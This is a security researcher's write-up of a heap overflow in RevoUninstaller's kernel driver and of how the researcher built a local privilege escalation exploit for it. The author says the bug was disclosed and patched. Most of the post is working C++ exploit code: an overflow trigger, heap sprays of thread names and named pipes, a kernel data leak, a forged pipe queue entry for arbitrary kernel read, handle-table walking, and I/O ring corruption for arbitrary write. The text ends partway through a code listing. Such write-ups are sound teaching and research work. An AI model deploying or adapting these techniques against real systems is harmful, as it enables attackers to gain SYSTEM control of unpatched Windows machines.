Exploit Github: https://github.com/Kalagious/RevoDetectorExploit/tree/master
Introduction
I found an exploit RevoUninstaller software that allows an attacker to elevate privileges using a heap overflow. In this post I go through how I found the bug and where. I also talk about the lengthy and technical process that goes into exploiting a driver bug like this. The driver itself gets loaded when the RevoUninstaller “Helper” setting is enabled. As of writing this post, the vulnerability has been responsibly disclosed to the RevoUninstaller team and has been patched. This post aims to demonstrate how exploit development for modern heap based overflows in Windows drivers can be done as well as explain how I made my exploit POC for RevoUninstaller.
Overflow
This overflow itself occurs in a driver IOCTL handler that is meant to read the name of any process being spawned. Once an IRP is received, the driver waits until the next process is spawned and then copies the windows process name into the user supplied IRP system buffer. This is where the overflow occurs. Due to the lack of length check, if the user supplies an IRP buffer that is too small and then spawns a process with a long name, the IRP buffer will be overflowed.
Before exploiting this overflow, it is important to note a few key characteristics about this specific bug. First, the size is easily controllable by the attacker via supplying the size of both the process name and IRP buffer. Second, the overflow occurs in a Windows process name. This means the overflow is a copy of a Unicode string. In this case, the overflow will stop after two consecutive null bytes due to Windows thinking this is a null terminator for the Unicode string. This will later become a significant thorn in my side. Thirdly, in this case the IRP buffer is allocated in the Non-Paged pool. This is important to note for later when deciding which objects to target.
Vulnerable Driver Function (Unchecked Memcpy)
__int64 __fastcall IOCtl_Handler(__int64 a1, IRP *IRP)
{
dword_140003080 = 1;
KeClearEvent(&Object);
KeWaitForSingleObject(&Object, UserRequest, 0, 1u, 0);
// OVERFLOW OCCURS HERE! Memcpy length is not checked before hand
// The user controls both the size of the data being copied and the destination buffer size
memcpy(IRP->AssociatedIrp.MasterIrp, processInformation, (unsigned int)processInformationSize);
IRP->IoStatus.Status = 0;
IRP->IoStatus.Information = (unsigned int)processInformationSize;
IofCompleteRequest(IRP, 0);
return 0;
}Triggering the Overflow
Triggering this specific overflow is a two step process. First, a usermode application must send and IRP to the driver to trigger the vulnerable handler. When the IRP is sent, a System Buffer is allocated within the Non-Paged Pool. The System Buffer is the size supplied by the process that sent the initial IRP. Once the driver receives the IRP, it will copy the next process name into the System Buffer using a CreateProcessNotifyRoutine. Since it is possible to control both the size of the System Buffer and the next spawned process name it is super easy to trigger the overflow with any desired size. The following is a very basic proof of concept that simply triggers the overflow with dummy data.
#include
#include
void SendIOCTL()
{
HANDLE hDevice = CreateFileW(
L"\\\\.\\RevoDetector",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
// Usermode buffer must be big enough to contain the whole
// overflow response to prevent overflow in the exploit process
char* sendBuffer = new char[0x500];
DWORD bytesReturned = 0;
memset(sendBuffer, 0x41, 0x500);
// Tell the driver the buffer is smaller than it really is (0x50)
BOOL status = DeviceIoControl(
hDevice,
CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS),
sendBuffer,
0x50,
sendBuffer,
0x50,
&bytesReturned,
NULL
);
}
int main()
{
// Send the IRP on a different thread, otherwise it will hang until a process is spawned
std::thread IOCTLThread(SendIOCTL);
Sleep(750);
// Spawn a process called DummyProc.exe which instantly exits
BYTE* processNameBuffer = new BYTE[0x100];
wchar_t processName[] = L"./DummyProc.exe ";
memcpy(processNameBuffer, processName, sizeof(processName));
// Fill the rest of the buffer with 0x45 to easily see the overflow
memset(processNameBuffer + sizeof(processName), 0x45, 0x100 - sizeof(processName));
CreateProcessW(NULL, (wchar_t*)processNameBuffer, NULL, NULL, TRUE, 0, NULL, NULL, new STARTUPINFO, new PROCESS_INFORMATION);
IOCTLThread.join();
}Running this code to trigger a basic overflow achieves the following results. The 0x41s in the first image show the System Buffer that is allocated for the IRP in order to contain the next spawned process name. This memory dump was taken right after the IRP was sent, but before the process with a forged name was spawned.

Once the process with a forged name is spawned using CreateProcessW, the long name overflows the allocated System Buffer for the IRP. This is shown here where the 0x45s appended at the end of the process name overflow past the System Buffer and corrupt the adjacent object with the “Vad” tag.

Non-Paged vs Paged Pool
It is important to distinguish which pool your overflow bug occurs in before developing an exploit. Certain objects in Windows will only ever be allocated to the Non-Paged pool while others will only ever be allocated to the Paged pool. This is important to know when choosing the object you plan on targeting. In my case, the object that contains an overflow is an IRP System Buffer which is allocated in the Non-Paged pool. This means that any object I plan to corrupt using an overflow must also be allocated in the Non-Paged pool. Otherwise, there will be no possibility of the target object being located right after the overflow object.
Exploitation Strategy
There are a number of ways to weaponize an overflow in a driver, the most obvious and simple being to use it to crash the machine. However, if an attacker wants to leverage the full potential of this bug class, they need to gain some capabilities. The holy grail of these being arbitrary read and arbitrary write. These capabilities allow an attacker to read and write the content of any memory address within the system. Once these capabilities are achieved, the attacker can use them for a number of potential exploitation strategies. In this post I will show how to use them to steal the system token and achieve local privilege escalation, but it is also possible to achieve kernel level code execution with some extra work.
Non-Paged Pool Target Objects
To achieve read and write primitives, I need to target specific objects that I can leverage to achieve these capabilities. By strategically modifying the data of these objects with the overflow, I can leverage their normal functionality to read or write system memory. The following table shows the objects I targeted in my exploit as well as what capability they are targeted for. There are 2 additional important things to note. All of these objects have variable sizes that are easily controllable by the user. This is important later down the road when it comes to allocating them in specific locations. They also are all allocated on the Non-Paged Pool which is important because that is where the vulnerable overflow object is allocated as well.
| Object Name | Capabilities |
|---|---|
| Thread Names | Adjacent Read |
| Named Pipe Data Queue | Arbitrary Read |
| I/O Ring | Arbitrary Write |
Heap Spraying
When exploiting an overflow based memory corruption, it is very important to be able control what is being overflowed. With stack based overflows, this is a irrelevant step because the stack layout is usually very consistent. However, with heap overflows, there is a lot of randomization introduced. The heap itself has no guarantee of having the same layout between different program executions. Futhermore, Windows intentionally tries to randomize the location of objects within the heap to reduce the reliability of this exact type of attack. Therefore, I have to employ a strategy called heap spraying to help target specific objects I intend to overflow.
To understand heap spraying on modern Windows systems, it is important to understand how the Low Fragmentation Heap(LFH) works. The LFH is a specific implementation of the heap that handles all allocations between 0x0 – 0x200 bytes in size. For each 0x10 byte interval(rounded up) there are specific buckets within the LFH. This means that 0x50 byte allocations will be allocated within the same page as one another. However, 0x50 and 0x60 byte allocations will never occur on the same page. For this reason it is extremely important to be precise with the size of both the payload and sprayed objects to ensure they end up near eachother.
With this in mind, what is heap spraying and how does it help increase reliability. Heap spraying begins by allocating thousands of target objects. The idea behind this is that all of the holes in the heap get filled with objects. From that point on, target objects will be allocated one after another filling up entire pages.

Now that a continuous block of sprayed objects is made, every 2nd or nth object can be strategically freed. This leaves a perfectly size hole of free heap space that matches the size of my overflow object. Since all early holes of this size were filled by the spray, it is very likely that the overflow object will land in one of these created slots when it is allocated.


By using this technique, it increases the likelihood that overflow will precede the desired target object. However, it is still important to note that the modern Windows LFH throws in extra unavoidable randomness to these allocations. This technique is still required to make the exploit somewhat consistent, however it is not possible to guarantee reliability.
Named Pipe Message Queue Arbitrary Read
To achieve an arbitrary read primitive, I will use the Named Pipe Data Queue Entry objects (DQE). These objects form a linked list and represent messages that are waiting to be read within a named pipe. Whenever a message is sent to a named pipe, a data queue entry is added to the end of the linked list. The DQEs are allocated on the non paged pool which is perfect for my application. The reason these are good overflow targets is because of the ability to read directly from a pointer. Most DQEs are buffered, meaning the data is stored as a buffer within the DQE itself. However, if the unbuffered type is set, the DQE will attempt to follow a pointer to an IRP system buffer when attempting to full-fill a read request. The data is then sourced from the system buffer associated from the IRP.
Buffered DQE Layout

Unbuffered DQE Layout

struct NP_DATA_QUEUE_ENTRY {
LIST_ENTRY NextEntry;
IRP* Irp; // Overflow Target
UINT64 SecurityContext;
ULONG EntryType; // Overflow Target
ULONG QuotaInEntry;
ULONG DataSize;
ULONG Reserved;
char Data;
};The unbuffered DQE provide a prime target for an overflow. If I can corrupt the DQE Struct and overwrite the IRP pointer, it can be directed to a fake IRP structure I allocate in user mode. At that point the forged IRP will point its “System Buffer” to an arbitrary address. When the named pipe goes to read a message from the Data Queue, it will follow the corrupted pointer to our forged IRP. Then it will use the fake IRP to find where to read data from, which ends up being any memory address I want to point the SystemBuffer pointer at. Because the forged IRP is within usermode, I can swap the system buffer as much as I want and have a reusable arbitrary read.
DQE Overflow Layout

Null Terminator Overflow Limitation
As I mentioned previously, the overflow occurs in a unicode string that is copied into a buffer. This means that if there are 2 or more consecutive null bytes in the overflow data, they will be interpreted as a string terminator and the data copy will stop. This means I have to ensure the data I intend to write with the overflow does not contain 2 null bytes, which limits the amount of data I can effectively modify.
One crucial limitation is the fact that user mode addresses always start with 2 nullbytes meaning I cannot write usermode addresses with my overflow. Fortunately, kernel addresses start with 0xFFFF instead of nullbytes, meaning I can overflow a pointer to point at a different kernel address. I can use a normal data queue to host my forged data in the kernel by sending a message to a named pipe containing the forged data. The only issue with this is that the IRP pointer would no longer be able to be changed, making the read a one time use.
To solve this, I create a fake DQE that is sent to a named pipe. This creates a real DQE where the content is a forged DQE. The forged DQE can be structured however I would like since it is simply being sent as a message. So I use it to point back to the forged user mode IRP.
Finally, now I overflow the Flink of a real DQE to the location of my forged one. Now, the named pipe thinks the forged DQE is the next entry in the linked list and will attempt to read data from it if requested. This technique allows me to bypass the Null Terminator limitation by writing a kernel address containing the forged DQE.
Another benefit to this technique is that I no longer have to overflow the Entry Type flag which is significantly further down within the DQE structure. Now the only field being overflowed is the Flink which is the very top field in a DQE.

There is one final key standing in the way of making this technique work. I do not have the address of the forged DQE within the kernel address space. I cannot overflow a real DQE flink with the address if I do not know where it is. To solve this, I take advantage of the linked list nature of the DQEs.
Thread Name Data Leaks
Because the DQEs are organized within a linked list, that means I can find the location of one DQE if I can read the pointer to it within another DQE. Fortunately, there is another object I can use to leak data on the heap. The Thread Name(TN) objects are a very simple Unicode data structure that can be tied to threads from within user mode. These objects simply hold a Unicode string and the size of the Unicode string. If the size value within the object is modified to be higher than the real size, the kernel will read past the end of the string when returning the thread name data. This data can be easily requested from user mode. By using the aforementioned heap spraying technique, I allocated thousands of TN objects. The following is my implementation of heap spraying for the thread names.
void ThreadNameManager::CreateThreads(UINT64 iThreadCount)
{
// Create n threads with garbage data
WCHAR* payload = new WCHAR[nameSize];
wmemset(payload, L'A', nameSize / sizeof(WCHAR));
THREAD_NAME_INFORMATION threadName = { 0 };
threadName.ThreadName.Buffer = payload;
threadName.ThreadName.Length = nameSize;
threadName.ThreadName.MaximumLength = nameSize;
threadCount = iThreadCount;
threads = new HANDLE[iThreadCount];
for (int i = 0; i < iThreadCount; i++) {
threads[i] = CreateThread(NULL, 0, DummyThread, NULL, STACK_SIZE_PARAM_IS_A_RESERVATION, NULL);
// Add a name attribute to each created thread
_NtSetInformationThread(threads[i], ThreadNameInformation, &threadName, sizeof(threadName));
}
}
void ThreadNameManager::FreeSlots(UINT64 iStartCount, UINT64 iInterval)
{
// Free every nth thread slot to create holes in the pool
THREAD_NAME_INFORMATION emptyThreadName = { 0 };
for (int i = iStartCount; i < threadCount; i += iInterval) {
_NtSetInformationThread(threads[i], ThreadNameInformation, &memcpy, sizeof(emptyThreadName));
}
}
int main()
{
nameManager.CreateThreads(5000);
nameManager.FreeSlots(1000, 9);
}With the thread names sprayed, I then use my overflow to attempt to corrupt the size of a thread name to be twice the size of the current chunk. I then read all sprayed TNs to see if one returns more data than it should. If one does, this indicates it has been modified by the overflow. The following includes the logic I use to check for a corrupted TN as well as the whole overflow and scanning loop to created a corrupted TN.
HANDLE ThreadNameManager::ScanForCorruptName()
{
ULONG returnLength = 0;
BYTE* buffer = new BYTE[nameSize * 3];
// For every thread name, check if one returns more data than it should
for (int i = 0; i < threadCount; i++)
{
NTSTATUS status = _NtQueryInformationThread(threads[i], ThreadNameInformation, buffer, nameSize * 4, &returnLength);
if (status >= 0 && returnLength > nameSize + 0x10) {
printf(" [*] ###### Found ThreadName Overwrite ######\n");
leakThread = threads[i];
return threads[i];
}
}
return NULL;
}
int main()
{
printf("\n [*] ###### Corrupting ThreadName to Leak Data (VOLATILE) ######\n");
printf(" [!!!] ###### BSOD RISK ######\n");
// Create properly formatted overflow data
ThreadNameOverflow tnOverflow;
tnOverflow.threadName.Length = CHUNK_SIZE * 2;
ThreadNameManager nameManager(CHUNK_SIZE);
// Continue until corrupted name found
while (nameManager.leakThread == NULL)
{
// Create Heap Spray layout
nameManager.CreateThreads(3000);
nameManager.FreeSlots(1000, 6);
// Trigger the overflow with the payload size
HeapOverflow(hDevice, CHUNK_SIZE, (BYTE*)&tnOverflow, sizeof(tnOverflow));
// Check if the overflow hit any of the threadnames
if (!nameManager.ScanForCorruptName())
printf(" [+] Retrying Pool Layout\n");
}
// Clean up the rest of the threads no longer needed
nameManager.CleanExtraThreads();
}This step is one of the two potential spots this exploit can cause the computer to blue screen. Unfortunately this is unavoidable due to the randomness of the modern Windows LFH. Because the overflow is blind, occasionally an object that is not a TN will be overflowed. This has a high likelihood of causing the kernel to crash when it tries to use the corrupted object. But if everything goes correctly, this now gives me the ability to read any data on the heap that follows the TN object. Now all I need to do is spray a number of DQEs that contain my forged DQE data within them. It is important to have at least 2 DQEs per named pipe. This ensures that the linked list is formed and each DQE will have a pointer to the location of another DQE within the kernel.


There are thousands of DQE allocated with the forged DQE data within them, however I only need the address of one to continue on. Allocating thousands of them increases the odds that one will land right behind the corrupted TN object. If one doesn’t, I can free all of the DQEs and keep retrying until one eventually does land there for me to leak. The leaked DQE will give me the address of the next DQE in the list, which will also contain my forged data. With this address, I simply need to offset to get the kernel address of the data section containing my forged DQE. The following code shows how I leak data from the heap adjacent to my corrupted TN and find a DQE in the leaked data.
BYTE* ThreadNameManager::LeakData()
{
BYTE* data = new BYTE[nameSize * 10];
BYTE* output = new BYTE[nameSize * 10];
memset(output, 0x0, nameSize * 3);
ULONG returnLength = 0;
NTSTATUS status = _NtQueryInformationThread(leakThread, ThreadNameInformation, data, nameSize * 4, &returnLength);
printf(" [*] Leaked %d bytes\n", returnLength);
memcpy(output, data + nameSize + 0x18, returnLength - nameSize);
return output;
}
POOL_PIPE_MESSAGE* ThreadNameManager::LeakPipeMessage(PipeManager* pipeManager)
{
// Every DQE has this pool tag, with it I can verify a DQE is in the leaked data
UINT32 targetHeader = 0x7246704e;
POOL_PIPE_MESSAGE* pipeMessage = NULL;
BYTE* leakedBytes = LeakData();
UINT64 leakSize = nameSize * 2;
UINT64 foundOffset = -1;
// Scan all leaked data for the pool tag
for (int i = 0; i <= leakSize - sizeof(UINT32); i++)
{
UINT32 currentDword = *(UINT32*)(leakedBytes + i);
if (currentDword == targetHeader)
{
foundOffset = i;
break;
}
}
// If the DQE is found, return only the data that is relevant for the DQE
if (foundOffset != -1)
{
printf(" [*] SUCCESS: Found target pool tag 0x%X at offset: 0x%X\n", targetHeader, foundOffset);
UINT64 startAddr = (foundOffset >= 16) ? (foundOffset - 16) : 0;
startAddr &= ~7;
pipeMessage = (POOL_PIPE_MESSAGE*)(leakedBytes + startAddr);
printf("\n Leaked Pipe Message\n");
; HexDumpLittleEndian(pipeMessage, 0x50);
}
else
printf(" [!] Pool tag not found\n");
return pipeMessage;
}
int main()
{
printf("\n [*] ###### Leak Forged Pipe Location ######\n");
ExploitManager exploitManager;
PipeManager pipeManager(CHUNK_SIZE, 1);
// Make a fake IRP for the forged DQE to point to
exploitManager.CreateFakeIRP();
// Create forged DQE data
POOL_PIPE_MESSAGE* fakePipeHeader = exploitManager.CreateFakeDataQueue();
// Allocate 5000 pipes with the forged DQES in their messages
pipeManager.CreatePipes(5000, fakePipeHeader);
// Check if any pipe is leaked by the TN
POOL_PIPE_MESSAGE* leakedPipe = nameManager.LeakPipeMessage(&pipeManager);
UINT64 targetMessageAddr = NULL;
UINT64 dataQueueAddr = NULL;
// Check if the leaked pipe is the first or second in the chain using some bytes i added to each message
// Pull out the repsective address based on its positon in the linked list
if (leakedPipe->dataQueue.Data == 0x39)
{
printf(" [*] Leaked Pipe 1st Pipe in Chain\n");
targetMessageAddr = (UINT64)leakedPipe->dataQueue.NextEntry.Flink;
dataQueueAddr = (UINT64)leakedPipe->dataQueue.NextEntry.Blink;
}
else if (leakedPipe->dataQueue.Data == 0x40)
{
printf(" [*] Leaked Pipe 2nd Pipe in Chain\n");
targetMessageAddr = (UINT64)leakedPipe->dataQueue.NextEntry.Blink;
dataQueueAddr = (UINT64)leakedPipe->dataQueue.NextEntry.Flink;
}
else
{
printf(" [*] Leaked Pipe is Invalid\n");
}
// Offset into the DQE to find get the location of the forged message
UINT64 forgedMessageAddr = targetMessageAddr + 0x50;
}With the address of my forged DQE, I overflow the Flink pointer of a valid DQE using the same heap spraying technique. This step is the second potential location for a bluescreen. Yet again I have to blindly overflow data and hope my heap spraying lined everything up correctly, however there is always a chance for things to be misaligned, resulting in a crash.
Fortunately, this is the last part I need to do blind as the whole structure is set up to enable my read primitive. Now I can simply change the pointer in my forged usermode IRP and call PeekNamedPipe on the pipe with the corrupted linked list. While I sprayed thousands of named pipes, I can find the corrupted one by initially pointing the forged IRP at a user mode address I control. There, I can put known data like a char array full of ‘A’s. Then I attempt to peak all of the sprayed pipes, the one that contains a continuous block of ‘A’s in the output is the corrupted one. From there the rest of the pipes are no longer needed.
// Scan all pipes for one containing extra data proving we corrupted it
HANDLE PipeManager::FindCorruptedPipe()
{
UINT32 expectedSize = pipeSize * 3-0x50;
BYTE* buffer = new BYTE[expectedSize * 20];
memset(buffer, 0x0, expectedSize * 20);
printf(" [*] Scanning %llu pipes for overwrite\n", pipeCount);
for (UINT64 i = 1; i < pipeCount; i++)
{
if (sPipes[i] != NULL && sPipes[i] != INVALID_HANDLE_VALUE)
{
DWORD bytesAvailable = 0;
BOOL status = PeekNamedPipe(sPipes[i], buffer, expectedSize, NULL, &bytesAvailable, NULL);
if (status)
{
for (UINT64 byteIndex = 0; byteIndex < expectedSize - 4; byteIndex += 4)
{
// Check if forged data was returned
if (*(UINT32*)(&buffer[byteIndex]) == 0x69696969)
{
printf("\n [*] SUCCESS: Corrupted pipe found at index %llu!\n", i);
corruptOffset = byteIndex;
delete[] buffer;
corruptedPipe = sPipes[i];
return corruptedPipe;
}
}
}
}
}
delete[] buffer;
return NULL;
}
int main()
{
printf("\n [*] ###### Corrupting PipeMessage Queue (VOLATILE) ######\n");
printf(" [!!!] ###### BSOD RISK ######\n");
// Create an overflow payload to overwrite the Flink pointer of the leaked DQE to point to my forged message
PipeMessageOverflow pmOverflow;
pmOverflow.pipeMessage.NextEntry.Flink = (_LIST_ENTRY*)forgedMessageAddr;
pmOverflow.pipeMessage.NextEntry.Blink = 0x0000;
HANDLE corruptedPipe = NULL;
PipeManager arbRePipes(CHUNK_SIZE, 2);
exploitManager.SetPipeManager(&arbRePipes);
UINT64 pipeCorruptionAttempts = 0;
while(true)
{
// Heap Spray pipes with messages
arbRePipes.CreatePipes(3000, NULL);
arbRePipes.CreateSlots(5000, 9);
// Trigger the overflow to corrupt the flink pointer of the leaked DQE to point to the
HeapOverflow(hDevice, CHUNK_SIZE, (BYTE*)&pmOverflow, sizeof(PipeMessageOverflow));
// Check if the overflow worked by scanning for a pipe that return data from the forged message
corruptedPipe = arbRePipes.FindCorruptedPipe();
if (corruptedPipe)
break;
if (pipeCorruptionAttempts > 2)
{
printf(" [!] Failed to Corrupt PipeMessage After 3 Attempts, Likelyhood of BSOD is HIGH! Exiting\n");
return 0;
}
pipeCorruptionAttempts++;
arbRePipes.ClearPipes();
}
}It is important to use PeekNamedPipe when doing these operations. If the traditional ReadFile function is called on a named pipe, it reads the data and attempts to clear the queued messages. This is a nightmare for me because it would attempt to delete my forged message, making the read a one shot. It would also attempt to walk and free the corrupted linked list, resulting in a crash. Fortunately, Windows offers and alternative function called PeekNamedPipe. This one reads the message queue of the pipe all the same, but it does not attempt to clear it afterwords. This means I can swap the IRP pointer as many times as I want and reread the corrupted message. Here is the code from my exploit that implements this logic.
void ExploitManager::Read(UINT64* iDestinationAddr, UINT64 iTargetAddr, UINT64 iSize)
{
// Swap out adress on Forged IRP
fakeIRP->SystemBuffer = (BYTE*)iTargetAddr;
// Make sure to read more data than the pipe contains so the whole queue is walked
UINT32 expectedSize = pipeManager->pipeSize * 3;
// Make a buffer big enough to contain the result
BYTE* buffer = new BYTE[expectedSize * 10];
memset(buffer, 0x0, expectedSize * 10);
DWORD bytesAvailable = 0;
// Read the messages
BOOL status = PeekNamedPipe(pipeManager->corruptedPipe, buffer, expectedSize, NULL, &bytesAvailable, NULL);
if (status)
{
// Based on where the corrpted message was in the linked list, the result data will be at a different point in the outputs
memcpy(iDestinationAddr, buffer + pipeManager->corruptOffset, iSize);
return;
}
printf(" [!] Read at %p Failed!\n", iTargetAddr);
}
With this whole chain complete, I have achieved the aforementioned layout of forged named pipes and now have a reusable arbitrary read. From this point on I aim to develop and arbitrary write primitive. To begin with this, there are a few other things I want to do in order to make getting the arbitrary write easier.
Finding the EPROCESS and Handle Table Structures
The Windows kernel holds a linked list of EPROCESS objects which store the general information about every process running within Windows. This is a very valuable target for me for a number reasons. Number one, the final step of this exploit is stealing the SYSTEM token from the system EPROCESS. I then replace my own token within my EPROCESS to gain SYSTEM level privileges. To do this I need to find an EPROCESS object so I can walk the chain.
Secondly, the EPROCESS structure contains a pointer to the Handle Table for my process. This allows me to translate usermode handles into the actual kernel address for their object. This is extremely powerful because I can then use my read primitive to verify any future overflows before triggering them. It also allows me to find the location of any of my corrupted objects so I can later restore them. However, I still need to find the EPROCESS structure first.
Lucky for me, the structures involved with management of the Named Pipes saves a pointer to the FILE_OBJECT they are associated with. FILE_OBJECTS also store a pointer to the EPROCESS. By following the pointer chain all the way back, I can get the address of the EPROCESS structure for my process.

The following code shows how I use my read primitive to walk this chain back and find the EPROCESS structure. Within the EPROCESS structure is a pointer to the OBJECT_TABLE or Handle Table. This table contains the mappings for user mode handles to kernel addresses for the objects.
printf("\n [*] ###### Locating EPROCESS and OBJECT_TABLE ######\n");
UINT64 FILE_OBJECT;
UINT64 EPROCESS;
exploitManager.Read(&FILE_OBJECT, dataQueueAddr - 0x10, sizeof(UINT64));
exploitManager.Read(&EPROCESS, FILE_OBJECT - 0x40, sizeof(UINT64));
printf(" [*] Found EPROCESS: %p\n", EPROCESS);
UINT64 HANDLE_TABLE;
exploitManager.Read(&HANDLE_TABLE, EPROCESS + 0x300, sizeof(UINT64));
printf(" [*] Found HANDLE_TABLE: %p\n", HANDLE_TABLE);
exploitManager.HANDLE_TABLE = HANDLE_TABLE;The EPROCESS address will be saved for later, and I will use the HANDLE_OBJECT table to resolve object addresses. The Handle Table is structured as a two level table in most cases, but this depends on the amount of handles within a process. In my case, the handle will always have two levels. This means there is a level 1 table that holds pointers to a number of level 2 tables. These level 2 tables actually hold the addresses for the objects the handles reference. The following is an image showing the structure of a two level handle table.

The following function shows how I handle the logic of walking the Handle Table to resolve a specific handle.
UINT64 ExploitManager::HandleToPointer(HANDLE iHandle)
{
// Walk handle to table to resolve user mode handle to kernel address
if (!HANDLE_TABLE)
{
printf(" [!] Cant Translate Handle Until HANDLE_TABLE Found!\n");
return NULL;
}
if (!TABLE_CODE)
{
Read(&TABLE_CODE, HANDLE_TABLE + 0x08, sizeof(UINT64));
if (!TABLE_CODE)
{
printf(" [!] Failed to get TABLE_CODE\n");
return NULL;
}
}
// Make sure it is a 2 level table
UINT64 tableLevel = TABLE_CODE & 3;
if (!tableLevel)
return NULL;
UINT64 l1TableBase = TABLE_CODE & ~3;
UINT64 handleIndex = (UINT64)iHandle / 4;
// Find which level 1 entry needs to be followed
UINT64 l1HandleOffset = (handleIndex / 0x100) * 0x8;
// Find the index in the level 2 table
UINT64 l2HandleOffset = (handleIndex % 0x100) * 0x10;
UINT64 l2TableBase;
Read(&l2TableBase, l1TableBase + l1HandleOffset, sizeof(UINT64));
INT64 handleEntry;
Read((UINT64*)&handleEntry, l2TableBase + l2HandleOffset, sizeof(UINT64));
// Must be signed int to fill top 4 bytes with F when shift
INT64 handleEntryShift = handleEntry >> 20;
UINT64 objectHeader = handleEntryShift << 4;
UINT64 fileObject = objectHeader + 0x30;
return fileObject;
}Arbitrary Write Using Corrupted I/O Rings
With a working arbitrary read primitive, the next step is to develop a functional arbitrary write primitive. The target object I chose to use for this step is the Windows IO Ring. These handle routing input and output operations from files, devices, and memory and are a great target for my write primitive. The main structure for IO Rings is called IORING_OBJECT and holds general information about a specific ring. Towards the end of the structure is a pointer to a list of pointers for IOP_MC_BUFFER_ENTRY objects. This list holds the input and output buffers for the IO Ring. Each of these RegBuffers holds and Address pointer that points to where the raw data is either read from or written to. The following shows the structure of a normal IO Ring.

If I am able to corrupt a pointer within this chain, I will be able to redirect the final Address pointer in the RegBuffer anywhere I want. Ideally, I would like to corrupt the IORING_OBJECT higher up the chain so that I can redirect **RegBuffers to a forged RegBuffer in user mode much like the named pipe corruption earlier. This would give me a very nice reusable write primitive.

Unfortunately, the RegBuffers pointer is 0xb8 bytes into the IORING_OBJECT and would require me overflowing that many bytes without writing 2 null bytes or corrupting an important parameter. While having a read primitive would make corrupting parameters a non concern the null byte limitation is not something I can overcome with this approach. There are simply too many fields to overwrite, making avoiding 2 null bytes in a row impossible.
//0xd0 bytes (sizeof)
struct _IORING_OBJECT // Reusable if corrupted, but too many clobbered fields
{
SHORT Type; //0x0 Clobbered Field
SHORT Size; //0x2 Clobbered Field
struct _NT_IORING_INFO UserInfo; //0x8 Clobbered Field
VOID* Section; //0x38 Clobbered Field
struct _NT_IORING_SUBMISSION_QUEUE* SubmissionQueue; //0x40 Clobbered Field
struct _MDL* CompletionQueueMdl; //0x48 Clobbered Field
struct _NT_IORING_COMPLETION_QUEUE* CompletionQueue; //0x50 Clobbered Field
ULONGLONG ViewSize; //0x58 Clobbered Field
LONG InSubmit; //0x60 Clobbered Field
ULONGLONG CompletionLock; //0x68 Clobbered Field
ULONGLONG SubmitCount; //0x70 Clobbered Field
ULONGLONG CompletionCount; //0x78 Clobbered Field
ULONGLONG CompletionWaitUntil; //0x80 Clobbered Field
struct _KEVENT CompletionEvent; //0x88 Clobbered Field
UCHAR SignalCompletionEvent; //0xa0 Clobbered Field
struct _KEVENT* CompletionUserEvent; //0xa8 Clobbered Field
ULONG RegBuffersCount; //0xb0 Clobbered Field
struct _IOP_MC_BUFFER_ENTRY** RegBuffers; //0xb8 OVERFLOW TARGET
ULONG RegFilesCount; //0xc0
VOID** RegFiles; //0xc8
};
//0x80 bytes (sizeof)
struct _IOP_MC_BUFFER_ENTRY // Safer to overflow, but not reusable
{
USHORT Type; //0x0 Clobbered Field
USHORT Reserved; //0x2 Clobbered Field
ULONG Size; //0x4 Clobbered Field
LONG ReferenceCount; //0x8 Clobbered Field
enum _IOP_MC_BUFFER_ENTRY_FLAGS Flags; //0xc Clobbered Field
struct _LIST_ENTRY GlobalDataLink; //0x10 Clobbered Field
VOID* Address; //0x20 OVERFLOW TARGET
ULONG Length; //0x28
CHAR AccessMode; //0x2c
LONG MdlRef; //0x30
struct _MDL* Mdl; //0x38
struct _KEVENT MdlRundownEvent; //0x40
ULONGLONG* PfnArray; //0x58
struct _IOP_MC_BE_PAGE_NODE PageNodes[1]; //0x60
}; However, there is still a way to get around this and achieve the same outcome. I can corrupt the IOP_MC_BUFFER_ENTRY instead. This approach only requires overflowing 0x20 bytes worth of data, which is much more manageable. Many of the fields being overflowed are not super crucial as well, meaning overflowing them with non zero data is not a concern.

By overflowing the address pointer of an IOP_MC_BUFFER_ENTRY, I effectively get a one-shot arbitrary write. This means everytime I want to write data I will have to do another overflow, which is not enough for my use case. Because I corrupted the named pipe linked list earlier on, I need to be able to reliably write data more than once to patch the values back in order to prevent a crash.
Fortunately, I can use this one-shot write to surgically target the **RegBuffers pointer in a different IO Ring. By pointing a write at the **RegBuffers, I no longer have to overflow 0xb8 bytes to modify the pointer. This is the approach I decided to take to achieve my arbitrary write primitive. To recap, I create 2 IO Rings. One IO Ring will have its IOP_MC_BUFFER_ENTRY corrupted by the overflow to achieve a one shot write. This one-shot write will be pointed at the IORING_OBJECT of the other IO Ring to achieve a reusable write primitive. The following shows how this exploit chain looks.

One other piece to note is that I can use the read primitive to ensure the safety of any overflows from now on. To do this, I allocate a bunch of IO RIngs and then use the OBJECT_TABLE to find where each IO Ring landed in the pool from their handles. I then read the data right before them to see if the IRP I will overflow landed before any of them. If it did I can overflow safely knowing that the correct object is being targeted. If not, I can spawn a process with a short name to not trigger the overflow and try again. The following code snippet shows how I do this and how I set up the whole IO Ring Write primitive.
IORingManager ioRingManager;
UINT64 reusableIORingCorruptionAddr;
UINT64 reusableIORingOriginalValue;
BYTE* ioRingData = NULL;
printf(" [*] Scanning IORings for adjacent overflow IRP\n");
// Designate a reusable IORing
exploitManager.reusableIORing = ioRingManager.CreateRing();
while (true)
{
// Ensure overlow safety by scanning adjacent chunks
std::thread IOCTLThread(SendIOCTL, hDevice, CalculateIRPSize(IORING_CHUNK_SIZE));
// Create 100 rings and see if any landed adjacent to the overflow chunk
ioRingManager.CreateRings(100);
ioRingData = exploitManager.ScanIORingforAdjacentOverflow(&ioRingManager);
if (ioRingData)
{
// Create the forged usermode reg buffer
exploitManager.CreateFakeRegBuffer(ioRingData + 0x10);
exploitManager.RemoveConsecutiveNulls(ioRingData, 0x30, 0x1);
// Get the kernel address of the target ring
UINT64 ioRingObject = exploitManager.HandleToPointer(*(HANDLE*)(exploitManager.reusableIORing));
if (!ioRingObject)
continue;
// Point the one shot write to the RegBuffer pointer in the reusable IORing
exploitManager.Read(&reusableIORingCorruptionAddr, ioRingObject + 0xb8, sizeof(UINT64));
if (!reusableIORingCorruptionAddr)
continue;
// Create overflow payload for first IORing
BYTE overflowData[0x400] = { 0 };
memset(overflowData, 0xAA, 0x50);
memcpy(overflowData + 0x10, ioRingData, 0x40);
memcpy(overflowData + 0x40, &reusableIORingCorruptionAddr, 0x8);
UINT64 payloadSize;
